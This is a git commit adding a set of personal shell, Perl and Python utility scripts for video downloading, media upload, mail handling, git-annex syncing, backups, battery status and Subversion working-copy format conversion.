partage public

This commit is contained in:
Meutel 2015-05-30 18:42:42 +02:00
commit a368f25d59
43 changed files with 5480 additions and 0 deletions

63
256colors2.pl Executable file
View File

@ -0,0 +1,63 @@
#!/usr/bin/perl
# Author: Todd Larason <jtl@molehill.org>
# $XFree86: xc/programs/xterm/vttests/256colors2.pl,v 1.2 2002/03/26 01:46:43 dickey Exp $
# use the resources for colors 0-15 - usually more-or-less a
# reproduction of the standard ANSI colors, but possibly more
# pleasing shades
# colors 16-231 are a 6x6x6 color cube
for ($red = 0; $red < 6; $red++) {
for ($green = 0; $green < 6; $green++) {
for ($blue = 0; $blue < 6; $blue++) {
printf("\x1b]4;%d;rgb:%2.2x/%2.2x/%2.2x\x1b\\",
16 + ($red * 36) + ($green * 6) + $blue,
($red ? ($red * 40 + 55) : 0),
($green ? ($green * 40 + 55) : 0),
($blue ? ($blue * 40 + 55) : 0));
}
}
}
# colors 232-255 are a grayscale ramp, intentionally leaving out
# black and white
for ($gray = 0; $gray < 24; $gray++) {
$level = ($gray * 10) + 8;
printf("\x1b]4;%d;rgb:%2.2x/%2.2x/%2.2x\x1b\\",
232 + $gray, $level, $level, $level);
}
# display the colors
# first the system ones:
print "System colors:\n";
for ($color = 0; $color < 8; $color++) {
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m\n";
for ($color = 8; $color < 16; $color++) {
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m\n\n";
# now the color cube
print "Color cube, 6x6x6:\n";
for ($green = 0; $green < 6; $green++) {
for ($red = 0; $red < 6; $red++) {
for ($blue = 0; $blue < 6; $blue++) {
$color = 16 + ($red * 36) + ($green * 6) + $blue;
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m ";
}
print "\n";
}
# now the grayscale ramp
print "Grayscale ramp:\n";
for ($color = 232; $color < 256; $color++) {
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m\n";

41
add_mg.sh Executable file
View File

@ -0,0 +1,41 @@
#!/bin/sh
MG_ROOT="/usr/local/www/photos.meutel.net/mediagoblin"
ALBUMS_ROOT="/home/mediagoblin/albums"
MG_USER=meutel
add_all()
{
echo "=== TAGS $2 $3 ==="
ADD_PATH=$1
echo "== path: $ADD_PATH"
FILES=$(find $ADD_PATH -type f -maxdepth 1 -iname "*.png" -o -iname "*.mp4" -o -iname "*.jpg")
for file in $FILES
do
echo "Ajout: $file"
TITLE=$(basename $file)
$MG_ROOT/bin/gmg addmedia $MG_USER "$file" --title "$TITLE" --tags "$2,$3"
done
}
ifs=$IFS
IFS='\
'
ALBUMS=$(ls $ALBUMS_ROOT)
echo "albums: $ALBUMS"
for album in $ALBUMS
do
ALBUM_NAME=$(basename $album)
TAGALBUM=$(echo $ALBUM_NAME | sed 's/ /_/g')
echo "Album: $ALBUM_NAME"
ALBUM_PATH="${ALBUMS_ROOT}/$ALBUM_NAME"
for subalbum in $(find $ALBUM_PATH -type d)
do
echo "Sous-album: $subalbum"
SUBALBUM_NAME=$(basename $subalbum)
TAGSUBALBUM=$(echo $SUBALBUM_NAME | sed 's/ /_/g')
add_all "$subalbum" "$TAGALBUM" "$TAGSUBALBUM"
done
done
IFS=$ifs

8
addlabel.sh Executable file
View File

@ -0,0 +1,8 @@
#!/bin/sh
FORMAIL=/usr/local/bin/formail
if [ -n "$1" ]; then
grep -v "X-Label:.*$1" | $FORMAIL -fA "X-Label: $1"
else
exit 1
fi

246
arte7-dl.sh Executable file
View File

@ -0,0 +1,246 @@
#!/bin/bash
# arte7-dl.sh - Download Arte+7 videos
# Version: 0.3.2
# Creation date: Sun, 26 Apr 2009 00:27:18 +0200
# Last update: Sun, 22 Nov 2009 21:35:34 +0100
# Author: CSM 'illovae' Seldon <druuna@dud-t.org>
# Copyleft 2009
# Helpers/Debuggers/Contributors:
# This script is a fork of an original idea by beubeud : Arte+7 Recorder
# http://codingteam.net/project/arte7recorder
# FREE ADVERTISE: http://u-classroom.net FTW!!
# arte7-dl.sh --help for help
# Dependancies: bash, mimms, wget, coreutils (echo, awk, grep, etc)
# arte7-dl.sh is distributed by license: Dual Beer-Ware/WTFPLv2
# THE BEER-WARE LICENSE:
# As long as you retain this notice you can do whatever you want with this
# stuff. If we meet some day, and you think this stuff is worth it, you can
# buy me a beer in return.
# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
# Version 2, December 2004
# Copies of this license document, and changing it is allowed as long
# as the name is changed.
# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
# TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
# 0. You just DO WHAT THE FUCK YOU WANT TO.
# NOTE for the video quality --
# With Arte7 you can download Medium Quality videos or High Quality videos.
# For the moment, this script haven't option to let you choose what video
# quality you want. The video quality is defined in this script in the $VQ
# variable below and use by default Medium Quality (MQ). Feel free to
# edit this variable at your convenience.
# BUG with mimms 3.2 --
# The original mimms 3.2 which can be downloaded from the project website
# http://savannah.nongnu.org/projects/mimms/ have a know bug : you cannot
# use the filename you want while downloading the stream. This is a function
# used by this script, so we invite you to use an other mimms version, or you
# can use a patched version. For example in debian, mimms have been patched to
# mimms 3.2.1, by debian devels, which is working properly.
# AND KNOW WE CAN BEGIN!
# Variables
# Name by which this script was invoked.
PROGNAME=$(basename $0)
VERSION="0.3.2"
# Video Quality
VQ=MQ # HQ == High Quality ; MQ = Medium Quality
# Others variables
USAGE="Usage: $PROGNAME {option}
NB: The [VALUES] are required.
Options are:
-h, --help You're looking at it
-l, --list List all availables shows
-i, --infos [VIDEO_ID] Get informations for a show using VIDEO_ID
-d, --download [VIDEO_ID] Download a file using VIDEO_ID
-v, --version Version and license
"
CASE=help
# To prevent hairy quoting and escaping later.
bq='`'
eq="'"
# The functions
# We want to get the list of available shows
function getlist
{
XMLLINK="http://plus7.arte.tv$(wget -q -O - http://plus7.arte.tv/ | \
grep xmlURL | awk -F'"' '{print $4}')"
wget -q -O - $XMLLINK | grep -F "<index>
<bigTitle>
<startDate>
<offlineDate>
<targetURL>" | sed -e 's/<index>/-- VIDEO #/g' \
-e 's/<bigTitle>/Title: /g' \
-e 's/<startDate>/Since: /g' \
-e 's/<offlineDate>/To: /g' \
-e 's/<targetURL>/Video ID: /g' \
-e 's/http[^>]*,CmC=//g' \
-e 's/,schedu[^>]*html/\n/g' | \
sed -e 's/^\s*//' | sed 's/<[^>]*>//g'
}
# We want informations from a show
function getinfos
{
# We get the stuffs
XMLLINK="http://plus7.arte.tv$(wget -q -O - http://plus7.arte.tv/ | \
grep xmlURL | awk -F'"' '{print $4}')"
GETXML=$(wget -q -O - "$XMLLINK" | grep -B 6 "$VIDEO_ID")
VIDEOURL=$(echo "$GETXML" | grep "<targetURL>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g")
if [ ! -z "$VIDEOURL" ]; then
# We want the name and date of the video and the HTML content
VIDEOTITLE=$(echo "$GETXML" | grep "<bigTitle>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g")
VIDEODATE=$(echo "$GETXML" | grep "<startDate>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g" | cut -d"T" -f1)
VIDEOHTML=$(wget -q -O - "$VIDEOURL")
# First we get the information
HEADLINE=$(echo "$VIDEOHTML" | grep -A 2 '<p class="headline">' | \
sed 's/<[^>]*>//g' | sed -e 's/^\s*//')
SYNOPSIS=$(echo "$VIDEOHTML" | grep -A 2 '<p class="text">' | \
sed 's/<[^>]*>//g' | sed -e 's/^\s*//')
INFOS=$(echo "$VIDEOHTML" | grep -A 2 '<p class="info">' | \
sed 's/<[^>]*>//g' | sed -e 's/^\s*//' | \
sed 's/(//' | sed 's/)/./')
# And finally we can display them
echo -e "Informations for "$bq$VIDEOTITLE$eq" ("$VIDEODATE"):\n"
echo -e "Headline --"$HEADLINE"\n"
echo -e "Synopsis --"$SYNOPSIS"\n"
echo -e "Others --"$INFOS
else
echo "$PROGNAME: there's no show whith the ID $bq$VIDEO_ID$eq"
echo "$PROGNAME: please check the show list to get a right ID"
echo "$PROGNAME: if your're sure of your ID, then this script might be deprecated"
echo "$PROGNAME: or the site may be broken..."
exit 1
fi
}
# Finally we want to download the wmv file
function getfile
{
# We get the stuffs + we define CONV for a good file renaming
XMLLINK="http://plus7.arte.tv$(wget -q -O - http://plus7.arte.tv/ | \
grep xmlURL | awk -F'"' '{print $4}')"
GETXML=$(wget -q -O - "$XMLLINK" | grep -B 6 "$VIDEO_ID")
CONV="y/abcdefghijklmnopqrstuvwxyzéèêçàù/ABCDEFGHIJKLMNOPQRSTUVWXYZEEECAU/"
if [ ! -z "$GETXML" ]; then
# We want the name and date of the video ; putting them together
VIDEOTITLE=$(echo "$GETXML" | grep "<bigTitle>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g" | sed -e $CONV | \
tr "[:blank:]" "_")
VIDEODATE=$(echo "$GETXML" | grep "<startDate>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g" | cut -d"T" -f1)
FILERENAME=$VIDEOTITLE"_"$VIDEODATE
# Now we want the mms link and the original filename
VIDEOURL=$(echo "$GETXML" | grep "<targetURL>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g")
VIDEOLINK=$(wget -q -O - "$VIDEOURL" | grep wmv | grep $VQ | cut -d"\"" -f4)
FILEORINAME=$(echo "$VIDEOLINK" | cut -d"/" -f8 | cut -d"." -f1)
MMSLINK=$(wget -q -O - "$VIDEOLINK" | grep mms | cut -d"\"" -f2)
# All stuff ok, we can proceed
mimms -r $MMSLINK $FILERENAME"_"$FILEORINAME".wmv"
else
echo "$PROGNAME: there's no show whith the ID $bq$VIDEO_ID$eq"
echo "$PROGNAME: please check the show list to get a right ID"
echo "$PROGNAME: if your're sure of your ID, then this script might be deprecated"
echo "$PROGNAME: or the site may be broken..."
exit 1
fi
}
# OK here we go now!
# Parse command line arguments.
while test $# != 0; do
case "$1" in
-h|--help)
CASE=help
shift
;;
-l|--list)
CASE=list
shift
;;
-i|--infos)
CASE=infos
shift
;;
-d|--download)
CASE=download
shift
;;
-v|--version)
echo "$PROGNAME ($VERSION) distributed under Dual Beer-Ware/WTFPLv2"
exit 0
;;
-- ) # Stop option processing
shift
break
;;
-? | --* )
case "$1" in
--*=* ) arg=`echo "$1" | sed -e 's/=.*//'` ;;
*) arg="$1" ;;
esac
exec 1>&2
echo "$PROGNAME: unknown or ambiguous option $bq$arg$eq"
echo "$PROGNAME: Use $bq--help$eq for a list of options."
exit 1
;;
*)
break
;;
esac
done
# for every case, do something!
case "$CASE" in
help)
echo "$USAGE" 1>&2
exit 0
;;
list)
getlist
;;
infos)
VIDEO_ID=$1
getinfos
;;
download)
VIDEO_ID=$1
getfile
;;
esac
exit 0

54
arte7dump Executable file
View File

@ -0,0 +1,54 @@
#!/bin/bash
#
# Arte+7 video downloader (french HD version)
# Author: Gerome Fournier
# Version: 0.3
# Date: 2013-09-15
# http://foutaise.org/code/
usage()
{
local progname=${0##*/}
cat <<EOF
Dump French HD version of a arte+7 video
Usage:
$progname <arte+7 url>
Example:
$progname "http://www.arte.tv/guide/fr/047158-000/evasion-fiscale?autoplay=1" > evasion-fiscale.flv
EOF
}
if [ "$1" == "-h" ]; then
usage
exit 0
fi
if [ "$#" -ne 1 ]; then
echo "Wrong number of arguments" >&2
exit 1
fi
# walk through several URLs to find the stream
link1=$(curl -s "$1" \
| grep ALL.json \
| head -n1 \
| sed -e 's/^.*arte_vp_url="//' -e 's/".*$//')
if [ -n "$link1" ]; then
json_hd_french=$(curl -s "$link1" \
| tr '{' '\n' \
| grep '"quality":"HD - 720p".*"versionCode":"\(VF\|VF-STF\|VOF-STF\)"' \
| tr ',' '\n')
streamer=$(grep '^"streamer"' <<< "$json_hd_french" | cut -d: -f2- | tr -d '"')
url=$(grep '^"url"' <<< "$json_hd_french" | cut -d: -f2- | tr -d '"')
if [ "${streamer:0:7}" == "rtmp://" ]; then
rtmpdump -r "$streamer" -y "mp4:$url"
exit 0
fi
fi
echo "Unable to find source stream" >&2
exit 1

76
attachement-http.sh Executable file
View File

@ -0,0 +1,76 @@
#!/bin/sh
#
# Copyright (c) 2010 Mary Gardiner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
## INFO
# This is a very simple script designed to be used when using the email client
# mutt remotely. It copies attachments to a web accessible folder and tells you
# where to view them.
#
# More details are available at http://puzzling.org/logs/thoughts/2010/May/6/mutt-attachments
# if you want to override OUTPUTDIR and VIEWINGDIR edit them here or create a
# ~/.copy-to-dir # file that looks like:
# OUTPUTDIR=someotherdir
# VIEWINGDIR=someother URI
# You can also optionally specify a location to rsync attachments to,
# RSYNCOUTPUTDIR=host:dir
# You'll probably want a passphraseless key for this and NO DELETION of rsynced
# attachments will take place.
### Extension
# use short generated file name
OUTPUTDIR=$HOME/public_html/attachments
VIEWINGDIR=https://ssl.meutel.net/~meutel/attachments
CONFIGFILE=$HOME/.copy-to-dir
if [ -e "$CONFIGFILE" ]
then
. "$CONFIGFILE"
fi
if [ -n "$1" ]
then
if [ -n "$RSYNCOUTPUTDIR" ]
then
SHORTNAME=`basename "$1"`
echo "Uploading attachment $SHORTNAME for viewing"
rsync --chmod=ugo+r --progress -ptve "ssh -C" "$1" "$RSYNCOUTPUTDIR"
echo
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME"
elif [ ! -d "$OUTPUTDIR" ]
then
echo "ERROR: '$OUTPUTDIR' doesn't exist, or is not a directory"
else
SHORTNAME=`md5sum "$1" | cut -c -4`
MIME_TYPE=`file -Lb --mime-type "$1"`
# utilisation de l'extension correspondant au type mime
FILE_EXT=$(grep $MIME_TYPE /etc/mime.types | awk '{ print $2}')
DELETE="$OUTPUTDIR/$SHORTNAME.$FILE_EXT"
cp "$1" "$DELETE"
# ajoute le type mime dans les attributs etendus
attr -s Content-Type -V "$MIME_TYPE" $DELETE > /dev/null
chmod 644 "$DELETE"
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME.$FILE_EXT"
fi
fi

106
auto_sync.sh Executable file
View File

@ -0,0 +1,106 @@
#!/usr/bin/env bash
die()
{
echo "$*" >&2
exit 1
}
git_rdiff()
{
git fetch -q
GITREMOTEDIFF=$( git diff --name-status remotes/origin/master )
if [ -n "$GITREMOTEDIFF" ];then
echo "$( pwd ) not synchronised with remote" 1>&2
echo "$GITREMOTEDIFF" 1>&2
fi
}
git_st()
{
GITSTATUS=$( git status --porcelain )
if [ -n "$GITSTATUS" ]; then
echo "Untracked files in $( pwd )" 1>&2
echo "$GITSTATUS" 1>&2
fi
}
annex_copy() {
# copy auto from/to every remote
for remote in $(git remote)
do
git ls-remote $remote 2>&1 > /dev/null && git-annex get --auto --fast --quiet --from $remote
git ls-remote $remote 2>&1 > /dev/null && git-annex copy --auto --fast --quiet --to $remote
done
}
annex_control() {
UNUSED=$( git-annex unused --fast | grep -v checking | grep -v 'fast mode enabled' )
if [ -n "$UNUSED" ]; then
echo "Unused data in $( pwd )" 1>&2
echo "++$UNUSED++" 1>&2
fi
# affiche les fichiers qui n'ont pas suffisamment de copies
git-annex fsck --fast > /dev/null
}
CONF=${1:-$HOME/.sync.cfg}
# echo Configuration: $CONF
[ -r $CONF ] || die "Missing configuration: $CONF"
ORIG_DIR=$PWD
#echo "ORIG_DIR $ORIG_DIR"
PIDFILE=${CONF}.pid
#echo "PIDFILE: $PIDFILE"
[ -f $PIDFILE ] && die "Pidfile exists: $PIDFILE"
touch $PIDFILE
declare -a LINE
exec < $CONF
dir_ok=1
while read -a LINE; do
# echo "${LINE[@]}"
if [[ "${LINE[@]}" =~ ^\[.*\]$ ]]; then
dir_head=${LINE[@]}
# bash > 4.2 dir=${dir_head:1: -1}
dir=${dir_head:1:${#dir_head}-2}
# echo "DIR $dir"
cd $ORIG_DIR
cd $dir
dir_ok=$?
pwd
elif [[ "${LINE[@]}" =~ ^# ]]; then
:
# echo COMMENT
elif [ $dir_ok -eq 0 ]; then
action="${LINE[0]}"
action_args="${LINE[@]:1}"
#echo ACTION $action
#echo ARGS $action_args
case "$action" in
annex.watch )
git-annex watch --quiet ;;
annex.sync )
git-annex sync --fast --quiet 2> /dev/null ;;
annex.copy)
annex_copy ;;
annex.to )
git-annex copy --auto --fast --quiet --to $action_args ;;
annex.from )
git-annex copy --auto --fast --quiet --from $action_args ;;
annex.control )
annex_control ;;
git.pull )
git pull -q ;;
git.diff )
git_rdiff ;;
git.status )
git_st ;;
git.push )
git commit -a --allow-empty-message -m "" && git push --porcelain ;;
esac
fi
done
cd $ORIG_DIR
#echo "PIDFILE: $PIDFILE"
rm -f $PIDFILE
[ -f $PIDFILE ] && die "Pidfile still exists $PIDFILE"

45
backup_obelix.sh Normal file
View File

@ -0,0 +1,45 @@
#!/bin/bash
# TODO
# home (hors données distribuées)
# repos git
# crypter les données secu
# copier vers ftp
# repertoire contenant les backups
BACKUP_DIR=/home/backup
BACKUP_CUR=$BACKUP_DIR/current
mkdir -p $BACKUP_CUR
function do_backup {
BACKUP_PATH=$1
BACKUP_NAME=$2
BACKUP_FILE=$BACKUP_DIR/$BACKUP_NAME.$(date +%Y%m%d).tar.gz
BACKUP_LST=$BACKUP_DIR/$BACKUP_NAME.lst
ARCHIVE_DIR=$BACKUP_DIR/$(date +%Y%m%d)
# si le lst existe, incremental
test -f $BACKUP_LST
INCR_BACKUP=$?
tar cpzf $BACKUP_FILE -C / --listed-incremental=$BACKUP_LST $BACKUP_PATH
# TODO crypt
# si non incremental (cad complet) copie vers repertoire archive
if [ $INCR_BACKUP -ne 0 ]
then
mkdir -p $ARCHIVE_DIR
mv $BACKUP_FILE $ARCHIVE_DIR
# effacer les backups incrementaux précédents
rm -rf $BACKUP_CUR
else
mv $BACKUP_FILE $BACKUP_CUR
fi
}
# /etc
do_backup "/etc/" "$(hostname).etc"
# webapps
# TODO pas besoin d'etre root
do_backup "/home/www" "$(hostname).www"

106
batt_status.pl Executable file
View File

@ -0,0 +1,106 @@
#!/usr/bin/perl
##############################
# Calcul l'etat de la batterie
##############################
use strict;
use vars qw(@Batt_Data %Useful);
# renvoit une liste de hash des valeurs lues (un element par batterie)
sub read_proc {
my @batts = find_batts();
my @Batt_Data;
for (@batts) {
my $batt_dir = $_;
my %h1 = read_Batt_Data($batt_dir.'state');
my %h2 = read_Batt_Data($batt_dir.'info');
# TODO mieux?
my %h = %h1;
for my $key ( keys %h2 ) {
$h{$key} = $h2{$key};
}
# le tableau contient une reference au hash
push @Batt_Data, {%h};
}
return @Batt_Data;
}
# lit un fichier de donnees de la batterie dans proc
sub read_Batt_Data {
my ($file) = @_;
my %data;
#print '>>',$file,"\n";
open(DATA, "< $file") or next;
while (<DATA>) {
if (/^([^:]+):\s+(.+)/){
#print "$1 -> $2\n";
$data{$1} = $2;
}
}
return %data;
}
# trouve les repertoires d'etat des batteries
sub find_batts {
my @batts;
my $proc_path = '/proc/acpi/battery/';
# TODO verifier que c'est un repertoire
opendir(BATTS, $proc_path) or die "can't open $proc_path: $!";
while (defined(my $bat_dir = readdir(BATTS))) {
# TODO verifier que c'est un repertoire
if ($bat_dir =~ /BAT([0-9])/) {
#print $1,$bat_dir,"\n";
$batts[$1] = $proc_path.$bat_dir.'/';
}
}
return @batts;
}
# synthetise les donnees utiles
sub summarize {
# capacite totale des batteries
#print $Batt_Data[0]{'present'},"\n";
my $total_full_cap = 0;
my $total_rem = 0;
my $total_rate = 0;
for my $href ( @Batt_Data ) {
my $cap = $href->{'last full capacity'} || 0;
# toujours en mAh ?
$total_full_cap += $_ for ( $cap =~ /(\d+) mAh/ );
#for ( keys %$href ) {
#print $_,"\n";
#}
my $remaining = $href->{'remaining capacity'} || 0;
#print $remaining,"\n";
$total_rem += $_ for ( $remaining =~ /(\d+) mAh/ );
my $rate = $href->{'present rate'} || 0;
$total_rate += $_ for ( $rate =~ /(\d+) mA/ );
}
$Useful{'capacity'} = $total_full_cap;
$Useful{'remaining'} = $total_rem;
$Useful{'rate'} = $total_rate;
# temps restant en heures (end of operation)
$Useful{'eooTime'} = $total_rem / $total_rate;
$Useful{'remainingPerc'} = 100*$total_rem/$total_full_cap;
return %Useful;
}
# TODO adapter selon l'OS
@Batt_Data = read_proc();
summarize();
print <<EOL;
total full cap $Useful{'capacity'}
total remaining cap $Useful{'remaining'}
total rate $Useful{'rate'}
EOL
printf("remaining: %.3f%%\n", $Useful{'remainingPerc'});
# TODO formattage delai
printf("remaining time: %d min\n", 60 * $Useful{'eooTime'});
# TODO heure de fin de fonctionnement
# TODO operation en cours (charge, decharge)

419
change-svn-wc-format.py Executable file
View File

@ -0,0 +1,419 @@
#!/usr/bin/env python
#
# change-svn-wc-format.py: Change the format of a Subversion working copy.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# ====================================================================
import sys
import os
import getopt
try:
my_getopt = getopt.gnu_getopt
except AttributeError:
my_getopt = getopt.getopt
### The entries file parser in subversion/tests/cmdline/svntest/entry.py
### handles the XML-based WC entries file format used by Subversion
### 1.3 and lower. It could be rolled into this script.
LATEST_FORMATS = { "1.4" : 8,
"1.5" : 9,
"1.6" : 10,
# Do NOT add format 11 here. See comment in must_retain_fields
# for why.
}
def usage_and_exit(error_msg=None):
"""Write usage information and exit. If ERROR_MSG is provide, that
error message is printed first (to stderr), the usage info goes to
stderr, and the script exits with a non-zero status. Otherwise,
usage info goes to stdout and the script exits with a zero status."""
progname = os.path.basename(sys.argv[0])
stream = error_msg and sys.stderr or sys.stdout
if error_msg:
stream.write("ERROR: %s\n\n" % error_msg)
stream.write("""\
usage: %s WC_PATH SVN_VERSION [--verbose] [--force] [--skip-unknown-format]
%s --help
Change the format of a Subversion working copy to that of SVN_VERSION.
--skip-unknown-format : skip directories with unknown working copy
format and continue the update
""" % (progname, progname))
stream.flush()
sys.exit(error_msg and 1 or 0)
def get_adm_dir():
"""Return the name of Subversion's administrative directory,
adjusted for the SVN_ASP_DOT_NET_HACK environment variable. See
<http://svn.apache.org/repos/asf/subversion/trunk/notes/asp-dot-net-hack.txt>
for details."""
return "SVN_ASP_DOT_NET_HACK" in os.environ and "_svn" or ".svn"
class WCFormatConverter:
"Performs WC format conversions."
root_path = None
error_on_unrecognized = True
force = False
verbosity = 0
def write_dir_format(self, format_nbr, dirname, paths):
"""Attempt to write the WC format FORMAT_NBR to the entries file
for DIRNAME. Throws LossyConversionException when not in --force
mode, and unconvertable WC data is encountered."""
# Avoid iterating in unversioned directories.
if not (get_adm_dir() in paths):
del paths[:]
return
# Process the entries file for this versioned directory.
if self.verbosity:
print("Processing directory '%s'" % dirname)
entries = Entries(os.path.join(dirname, get_adm_dir(), "entries"))
entries_parsed = True
if self.verbosity:
print("Parsing file '%s'" % entries.path)
try:
entries.parse(self.verbosity)
except UnrecognizedWCFormatException, e:
if self.error_on_unrecognized:
raise
sys.stderr.write("%s, skipping\n" % e)
sys.stderr.flush()
entries_parsed = False
if entries_parsed:
format = Format(os.path.join(dirname, get_adm_dir(), "format"))
if self.verbosity:
print("Updating file '%s'" % format.path)
format.write_format(format_nbr, self.verbosity)
else:
if self.verbosity:
print("Skipping file '%s'" % format.path)
if self.verbosity:
print("Checking whether WC format can be converted")
try:
entries.assert_valid_format(format_nbr, self.verbosity)
except LossyConversionException, e:
# In --force mode, ignore complaints about lossy conversion.
if self.force:
print("WARNING: WC format conversion will be lossy. Dropping "\
"field(s) %s " % ", ".join(e.lossy_fields))
else:
raise
if self.verbosity:
print("Writing WC format")
entries.write_format(format_nbr)
def change_wc_format(self, format_nbr):
"""Walk all paths in a WC tree, and change their format to
FORMAT_NBR. Throw LossyConversionException or NotImplementedError
if the WC format should not be converted, or is unrecognized."""
for dirpath, dirs, files in os.walk(self.root_path):
self.write_dir_format(format_nbr, dirpath, dirs + files)
class Entries:
"""Represents a .svn/entries file.
'The entries file' section in subversion/libsvn_wc/README is a
useful reference."""
# The name and index of each field composing an entry's record.
entry_fields = (
"name",
"kind",
"revision",
"url",
"repos",
"schedule",
"text-time",
"checksum",
"committed-date",
"committed-rev",
"last-author",
"has-props",
"has-prop-mods",
"cachable-props",
"present-props",
"conflict-old",
"conflict-new",
"conflict-wrk",
"prop-reject-file",
"copied",
"copyfrom-url",
"copyfrom-rev",
"deleted",
"absent",
"incomplete",
"uuid",
"lock-token",
"lock-owner",
"lock-comment",
"lock-creation-date",
"changelist",
"keep-local",
"working-size",
"depth",
"tree-conflicts",
"file-external",
)
# The format number.
format_nbr = -1
# How many bytes the format number takes in the file. (The format number
# may have leading zeroes after using this script to convert format 10 to
# format 9 -- which would write the format number as '09'.)
format_nbr_bytes = -1
def __init__(self, path):
self.path = path
self.entries = []
def parse(self, verbosity=0):
"""Parse the entries file. Throw NotImplementedError if the WC
format is unrecognized."""
input = open(self.path, "r")
# Read WC format number from INPUT. Validate that it
# is a supported format for conversion.
format_line = input.readline()
try:
self.format_nbr = int(format_line)
self.format_nbr_bytes = len(format_line.rstrip()) # remove '\n'
except ValueError:
self.format_nbr = -1
self.format_nbr_bytes = -1
if not self.format_nbr in LATEST_FORMATS.values():
raise UnrecognizedWCFormatException(self.format_nbr, self.path)
# Parse file into individual entries, to later inspect for
# non-convertable data.
entry = None
while True:
entry = self.parse_entry(input, verbosity)
if entry is None:
break
self.entries.append(entry)
input.close()
def assert_valid_format(self, format_nbr, verbosity=0):
if verbosity >= 2:
print("Validating format for entries file '%s'" % self.path)
for entry in self.entries:
if verbosity >= 3:
print("Validating format for entry '%s'" % entry.get_name())
try:
entry.assert_valid_format(format_nbr)
except LossyConversionException:
if verbosity >= 3:
sys.stderr.write("Offending entry:\n%s\n" % entry)
sys.stderr.flush()
raise
def parse_entry(self, input, verbosity=0):
"Read an individual entry from INPUT stream."
entry = None
while True:
line = input.readline()
if line in ("", "\x0c\n"):
# EOF or end of entry terminator encountered.
break
if entry is None:
entry = Entry()
# Retain the field value, ditching its field terminator ("\x0a").
entry.fields.append(line[:-1])
if entry is not None and verbosity >= 3:
sys.stdout.write(str(entry))
print("-" * 76)
return entry
def write_format(self, format_nbr):
# Overwrite all bytes of the format number (which are the first bytes in
# the file). Overwrite format '10' by format '09', which will be converted
# to '9' by Subversion when it rewrites the file. (Subversion 1.4 and later
# ignore leading zeroes in the format number.)
assert len(str(format_nbr)) <= self.format_nbr_bytes
format_string = '%0' + str(self.format_nbr_bytes) + 'd'
os.chmod(self.path, 0600)
output = open(self.path, "r+", 0)
output.write(format_string % format_nbr)
output.close()
os.chmod(self.path, 0400)
class Entry:
"Describes an entry in a WC."
# Maps format numbers to indices of fields within an entry's record that must
# be retained when downgrading to that format.
must_retain_fields = {
# Not in 1.4: changelist, keep-local, depth, tree-conflicts, file-externals
8 : (30, 31, 33, 34, 35),
# Not in 1.5: tree-conflicts, file-externals
9 : (34, 35),
10 : (),
# Downgrading from format 11 (1.7-dev) to format 10 is not possible,
# because 11 does not use has-props and cachable-props (but 10 does).
# Naively downgrading in that situation causes properties to disappear
# from the wc.
#
# Downgrading from the 1.7 SQLite-based format to format 10 is not
# implemented.
}
def __init__(self):
self.fields = []
def assert_valid_format(self, format_nbr):
"Assure that conversion will be non-lossy by examining fields."
# Check whether lossy conversion is being attempted.
lossy_fields = []
for field_index in self.must_retain_fields[format_nbr]:
if len(self.fields) - 1 >= field_index and self.fields[field_index]:
lossy_fields.append(Entries.entry_fields[field_index])
if lossy_fields:
raise LossyConversionException(lossy_fields,
"Lossy WC format conversion requested for entry '%s'\n"
"Data for the following field(s) is unsupported by older versions "
"of\nSubversion, and is likely to be subsequently discarded, and/or "
"have\nunexpected side-effects: %s\n\n"
"WC format conversion was cancelled, use the --force option to "
"override\nthe default behavior."
% (self.get_name(), ", ".join(lossy_fields)))
def get_name(self):
"Return the name of this entry."
return len(self.fields) > 0 and self.fields[0] or ""
def __str__(self):
"Return all fields from this entry as a multi-line string."
rep = ""
for i in range(0, len(self.fields)):
rep += "[%s] %s\n" % (Entries.entry_fields[i], self.fields[i])
return rep
class Format:
"""Represents a .svn/format file."""
def __init__(self, path):
self.path = path
def write_format(self, format_nbr, verbosity=0):
format_string = '%d\n'
if os.path.exists(self.path):
if verbosity >= 1:
print("%s will be updated." % self.path)
os.chmod(self.path,0600)
else:
if verbosity >= 1:
print("%s does not exist, creating it." % self.path)
format = open(self.path, "w")
format.write(format_string % format_nbr)
format.close()
